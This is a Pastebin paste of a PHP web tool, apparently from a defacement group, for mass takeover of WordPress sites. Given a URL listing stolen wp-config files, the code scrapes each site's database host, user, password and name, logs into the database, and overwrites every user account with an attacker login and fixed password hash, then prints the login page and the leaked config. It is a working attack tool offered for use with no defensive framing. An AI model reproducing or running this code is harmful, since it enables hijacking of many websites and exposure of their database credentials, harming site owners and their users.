Advertisement
Guest User

Untitled

a guest
Aug 21st, 2019
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.31 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>WP Mass by Rooted Syntax</title>
  4. <link rel="SHORTCUT ICON" href="http://www.clipartbest.com/cliparts/di8/X5M/di8X5M4XT.png">
  5. </head>
  6. <style type="text/css">
  7. @import 'https://fonts.googleapis.com/css?family=Iceland';
  8. html,body{
  9. background: black;
  10. padding: 0;
  11. direction: ltr;
  12. margin: 0;
  13. }
  14. h1{
  15. color:#16a085;
  16. text-shadow:0 0 5px;
  17. font-family: Iceland;
  18. }
  19. #gter{
  20. position: absolute;
  21. top: 0;
  22. width: 100%;
  23. text-align: center;
  24. background: black;
  25. color:#fff;
  26. padding-top: 10px;
  27. padding-bottom: 10px;
  28. font-family: Iceland;
  29. margin-bottom:20px;
  30. }
  31. #gter span{
  32. color:white;
  33. font-size: 18px;
  34. text-shadow: :0px 0px 15px #00ffff;
  35. }
  36. .f{
  37. color:white;
  38. font-family: Iceland;
  39. text-shadow: 0 0 15px #00ffff;
  40. font-size: 21px;
  41. }
  42. a{
  43. font-family: Iceland;
  44. text-decoration: none;
  45. color:white;
  46. text-shadow:0 0 15px #00ff00;
  47. }
  48. form{
  49. margin-top: 120px;
  50. }
  51. input[type=submit]{
  52. font-size:20px;
  53. height: 30px;
  54. width: 165px;
  55. border: 2px solid red;
  56. color: yellow;
  57. background-color: black;
  58. font-family: Iceland;
  59. }
  60. input[type=submit]:hover{
  61. box-shadow: 0 0 2px #ff0000;
  62. }
  63. input[type=text]{
  64. font-family:Iceland;
  65. width: 450px;
  66. height: 30px;
  67. color: red;
  68. background: #000000;
  69. border: 1px solid #00ff00;
  70. padding: 5px;
  71. text-align: center;
  72. font-size:20px;
  73. }
  74. input[type=text]:focus{
  75. box-shadow: 0 0 3px #ff0000;
  76. }
  77. .heading{
  78. color:white;
  79. font-size:50px;
  80. margin-top: 60px;
  81. margin-bottom: -110px;
  82. font-family:Iceland;
  83. text-shadow:0px 0px 20px red;
  84.  
  85. }
  86. </style>
  87.  
  88.  
  89. </head>
  90. <body>
  91. <center>
  92. <div id="gter"><span>Copyright © 2017 Coded by Rooted Syntax from X-Force Cyber Army</span></div>
  93. <center><p class="heading">WP Mass User Change by Rooted Syntax</p></center>
  94. <br /><br />
  95. <form method="post">
  96. <input type="text" name="config" placeholder="Config URL Here">
  97. <br><br>
  98. <input type="submit" name="ch" value="Change Admin">
  99. </form>
  100. </center>
  101.  
  102. <?php set_time_limit(0);
  103. error_reporting(0);
  104. if($_POST['ch']){ $get2 = file_get_contents($_POST['config']);
  105. preg_match_all('#<a href="(.*?)"#', $get2, $config);
  106. foreach($config[1] as $don){ $get = file_get_contents($_POST['config']."/".$don);
  107. preg_match_all("#'DB_HOST', '(.*?)'#", $get, $host);
  108. foreach($host[1] as $don){ $host = $don;
  109. } preg_match_all("#'DB_PASSWORD', '(.*?)'#", $get, $pass);
  110. foreach($pass[1] as $done){ $password = $done;
  111. } preg_match_all("#'DB_USER', '(.*?)'#", $get, $user);
  112. foreach($user[1] as $done1){ $user = $done1;
  113. } preg_match_all("#'DB_NAME', '(.*?)'#", $get, $name);
  114. foreach($name[1] as $done2){ $name = $done2;
  115. } preg_match_all("#$table_prefix = '(.*?)'#", $get, $prefix);
  116. foreach($prefix[1] as $done3){ $prefix = $done3;
  117. } $connect = mysqli_connect($host,$user,$password,$name);
  118. if($connect){ $query1 = mysqli_query($connect,"select * from ".$prefix."options where option_name='siteurl'");
  119. while($siteurl = mysqli_fetch_array($query1)){ $site_url = $siteurl['option_value'];
  120. } $query2 = mysqli_query($connect,"update ".$prefix."users set user_login='m4shell',user_pass='103286836c1b86b2ba7805c8cbee02a6'");
  121. if($query2){ echo "<center><span class=f>URL : <a href='$site_url/wp-login.php' target='_blank'>$site_url/wp-login.php</a><br>".$get."<br>UserName : admin<br><br>Password : admin<br><br></span></center>";
  122. } } } }
  123. ?>
  124. </body>
  125. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement